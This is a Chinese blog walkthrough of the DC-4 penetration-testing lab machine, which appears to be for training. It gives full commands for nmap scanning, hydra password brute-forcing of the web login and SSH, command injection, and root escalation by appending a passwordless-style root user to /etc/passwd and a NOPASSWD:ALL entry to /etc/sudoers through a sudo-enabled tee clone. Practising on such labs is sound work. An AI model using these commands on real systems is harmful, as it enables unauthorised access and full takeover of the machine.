DC-4渗透

最新推荐文章于 2023-04-18 19:22:29 发布
最新推荐文章于 2023-04-18 19:22:29 发布
阅读量157 收藏
点赞数
分类专栏: 渗透测试 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_53577336/article/details/119150383
版权

0x00 简介

DC-4渗透靶机较为简单,主要考察点暴力破解,这里简单流程快速渗透

0x01 信息收集

1)发现IP
靶机设置在同一网段,扫描彧内存活主机

srp-scan -l
发现IP

2)发现端口
使用nmap全端口扫描

nmap -A -p- 192.168.213.146
发现 22 80 端口

出现web页面端口与ssh端口,这里思路应该按照web页面出发,尝试登录web页面继续收集信息

登录页面
这里提示登录用户名admin,这的考点是暴力破解,下面开始渗透过程

0x02 渗透过程

使用hydra结合kali自带字典爆破破解密码,因为这是结果设计的靶机程序,在实战中可以结合情况,生成相对应的字典去破解相关程序,
kali自带密码字典位置:/usr/share/wordlists/rockyou.txt.gz

hydra -l admin -P /usr/share/wordlists/rockyou.txt.gz 192.168.213.146 http-post-form "/login.php:username=^USER^&password=^PASS^:S=logout" -F
-l:指定用户
-P:大写指定字典,小写指定具体账户
http-post-form:页面的提交方式
/logic.php:检测账号页面(并非当前登录页面,因为当前登录页面没有回显)
username=^USER^&password=^PASS^:指定变量(页面源码获得)
S=logout:测试是否成功爆破并且返回成功登录页面特有参数,从而判定爆破成功
-F:爆破成功停止爆破

hydra参数参考
暴力获得密码
暴力破解密码:happy
登陆后台发现存在三个终端命令,思路变是尝试使用bur抓包分析使用其他命令
发现存在命令
使用抓包尝试使用其他命令
ls
用户判断
从这里判断用户为普通用户,后面也一定存在权限提升
发现特殊用户
发现用户下存在字典
发现用户下存在字典,将字典导出,将用户做成另外账户字典,
继续使用hydra爆破ssh密码(猜测)
制作字典
hydra爆破ssh

hydra -L /dc-user.txt -P /dc-4.txt  ssh://192.168.213.146

爆破成功
登录ssh账户
登录ssh
因为小黄之前已经测试完毕DC-4靶机,思路是从查看用户下面的一些文件信息入手,发下存在一封root发来的邮件,这里提示到邮件,所以直接去etc下mail邮件查看其他所有邮件,成功的发现了另外一个账户的密码
charles账户密码
尝试登录charles用户
查看一下可以调用的root命令,因为这一步肯定还没有到提权

sudo -l

登录成功
通过小黄之前发过的suid提权网站参考资料,却没有发现teehee这个命令,
https://gtfobins.github.io/gtfobins/git/
那么这里直接查看帮助,看如何使用该命令

teehee --help

发现障碍
发现这里正确的命令是tee,这可能是一个作者设计的障碍
tee是一个可以给文件添加命令的,而且这里是root权限,可以给所有文件随意添加命令!!!!
那么思路就豁然开朗了

0x03 权限提升

思路1.直接添加一个没有密码的管理员权限

perl -le 'print crypt("123456", "aa")'得到我们要添加的用户的密码。
echo "good:aaAN1ZUwjW7to:0:0:::/bin/bash" | sudo teehee -a /etc/passwd
su - good

思路2:修改sudo su配置文件,给普通用户也写上与root一样的权限,那么一切都🆗了
思路还有很多这里介绍一下思路2

echo "charles ALL=(ALL:ALL) NOPASSWD:ALL" | sudo teehee -a /etc/sudoers
将root权限全部添加到charles账户

提权成功

发现flag

渗透完成!
小黄直接按照正确思路写完,自己第一次还是多尝试

告白热
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
DC-4渗透靶机详解
weixin_51083551的博客
09-12 4064
萌新DC系列靶机渗透详解之 DC-4 “DC-3好难呜呜,先打DC-4” 1. 明确目标 获得靶机 root 权限,找到root账户下的 flag 2. 信息收集 使用 arp-scan 扫描网段下的主机 └─# arp-scan -l
DC-4-Web渗透测试靶机
最新发布
01-19
DC-4-Web渗透测试靶机】是一个专门为网络安全专业人士设计的模拟环境,主要用于学习和实践Web渗透测试技术。在Web渗透测试中,目标是识别并利用网站应用程序的安全漏洞,以便于预防或修复这些漏洞,保护真实的网络...
DC-4渗透实战(详细过程)
tzyyyyyy的博客
10-17 821
DC-4靶机渗透实战 利用各种姿势方法获取最终flag
DC-4靶机渗透测试
读书 买花 长大
04-18 763
DC-4
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
9.100个渗透测试实战#9(DC-4)
01-09
世间一切皆可努力  感谢浏览 目录   一、实验环境 二、实验流程 三、实验步骤 (一)信息收集——主机发现阶段 1.查看kali的网卡、IP等信息;(网卡名:eth0,IP地址:192.168.97.129) 2.查看靶机页面;...
dc-4靶机练习.docx
01-02
第一步;靶机在web信息收集,burp获取登陆用户名和密码。 第二步:利用反弹shell后发现一封邮件,拿到新... 第三步:通过sudo -l]发现不用登录root可以使用的命令 [teehee --help][teehee -a]增加用户,具有root权限
VulnHub渗透测试靶场- DC-8
11-21
DC-8 是另一个专门建造的易受攻击的实验室,旨在获得渗透测试领域的经验。 这个挑战有点像实际挑战和“概念验证”,即在 Linux 上安装和配置的双因素身份验证是否可以防止 Linux 服务器被利用。 此挑战的“概念...
Webshell工具的流量特征分析(菜刀,蚁剑,冰蝎,哥斯拉)
热门推荐
告白的博客
05-31 2万+
0x00 前言 使用各种的shell工具获取到目标权限,即可进行数据操作,今天来简要分析一下目前常使用的各类shell管理工具的流量特诊,帮助蓝队同学在风险识别上快速初值 0x01 中国菜刀流量分析 0x02 ......
api接口安全测试-Wsdl&Swagger&Webpack
告白的博客
05-01 7739
0x00 api接口 通常在网站的通讯中,很多会调用api接口去方便更多信息的管理与调用,但是当使用某些api时,在开发人员未对api接口做出访问策略限制或其他的加固,会导致其他的用户发现api的时候可能会从中获取到敏感信息泄露,或者其他的sql注入等等安全问题,本文介绍三种api的利用与发现 0x01 于#WebService类的Wsdl 在WebService的开发,特别是和第三方有接口的时候,走的是SOAP协议,然后会有WSDL文件(或网址),这时候可以对wsdl文件进行相关的测似,敏感信息等等。
cisp-pte真题解答
告白的博客
01-20 3653
0x00 实例1 sql注入 poc:http://192.168.222.135:1081/vulnerabilities/fu1.php?id=-1%') ununionion select 1,load_file('/tmp/key'),3,4,5,6,7--+ 知识点:1.双写绕过 2.load_file 读取文件内容 0x02 文件上传 知识点: 1.文件内容大小写绕过,且检测文件头内容标识 2.白名单过滤 %00自行添加php文件名截断 3.注意使用原文件名不需要改变 0x03 文件包含
渗透测试-应用协议安全Rsync&SSH&RDP&FTP
告白的博客
04-11 3365
渗透测试中的信息收集的环节,对于端口的探针是一个重点关注的地方,不同的端口会有代表的不同的协议传输的服务,而对于这些一些常见的服务端口,我们需要对其进行的渗透测试做一个简要的汇总
漏洞发现-web漏洞工具的联动使用
告白的博客
05-22 1881
0x00 漏扫简介 简介针对web层面的漏洞扫描,以及一些工具的联动使用提高效率,因为不同的对象需要使用不同类型的扫描,例如awvs针对国内的cms框架可能扫描的效率不是那么高,比较awvs是国外维护更新,所以在这种情况下并不是一款漏扫可以解决全部问题,这也是新手小白在测试的说说容易出现的问题。 项目地址在后面自取 0x01 ...
漏洞发现-浏览器插件&&BurpSuite漏扫插件
告白的博客
05-27 889
0x00 浏览器插件&&BurpSuite漏扫插件 浏览器插件简介: 浏览器的便捷插件可以帮助我们在渗透或者信息收集的同时快速定位目标信息等 burpsutie插件: 在获取道流量数据包,可以快速检测目标是否存在常见通用漏洞,例如st2,spring,log4j,welogic框架等 0x01 浏览器便捷插件 (1)FOFA Pro View:根据fofa的联动查询,前提保证fofa会员登陆状态,目前存在谷歌,火狐版本 (2) Hack-Tools : 功能包括: 动态反向Sh
什么是渗透测试?
告白的博客
07-04 731
0x00 什么是渗透测试? 渗透测试是在客户给予权限的情况下通过模拟黑客利用自动化技术和手段化技术结合对某平台网站进行入侵、以达到监测平台所存在的漏洞等一些列问题、并且提出相应的加强防护的措施、以加强web安全的一整个过程。 0x01 测试的分类 黑盒测试:在这种方法中,测试人员在不了解其详细信息的情况下评估目标系统,网络或过程。他们需要具备很高的技术水平,完全模拟真实的黑客环境对web进行攻击、一般比较比较耗费时间、并且需要具备很高的技术水平、好处在于可以很好的监测web安全紧急响应程序。 白盒测
DC-1靶场通关笔记
告白的博客
07-19 726
0x00 DC-1靶场介绍 靶场介绍:关于VulnhubVulnhub是一个特别好的渗透测试实战网站,提供了许多带有漏洞的渗透测试 渗透要求:靶机需要获得root权限,并找到所有的5个flag 环境配置:因不知道DC-1靶机的IP,所有我们需要将靶机和kali放在同一个局域网里面,这里我选择NAT模式 0x01 信息收集 首先进去DC-1靶场环境,显示一个登录页面,我们无法得到账户与密码,因为靶机在NAT模式,故可以用域内存活主机利用工具扫描域内存活主机 1)目标IP收集 这里利用kali扫描域内存
waf绕过-线程代理漏扫
告白的博客
06-01 447
waf漏扫绕过思路
渗透DC-3-内核提权-文件共享
告白的博客
08-11 443
0x00 环境介绍 DC-3环境需要修改一下变量,不然无法进入,如下即可 0x01 信息搜集 老规矩了 IP 端口 web… 1)IP收集 asp-scan -l 2)端口收集 nmap -A -p- 192.168.213.151 3)子域名目录爆破 dirb http://192.168.213.151 访问web页面开始渗透 4)指纹收集 whatweb http://192.168.213.151 0x00 渗透测试 登录web页面,熟悉的一眼看到框架—Joomla 继续使用框架扫描 j
渗透DC-1靶机设计思路
05-24
4. 渗透攻击:根据扫描结果,利用漏洞进行攻击。可以使用一些常见的攻击手段,如SQL注入、XSS、文件包含、远程代码执行等。 5. 提升权限:在攻击成功后,需要提升自己的权限,获取更高的权限。可以使用一些提权工具...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

告白热

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值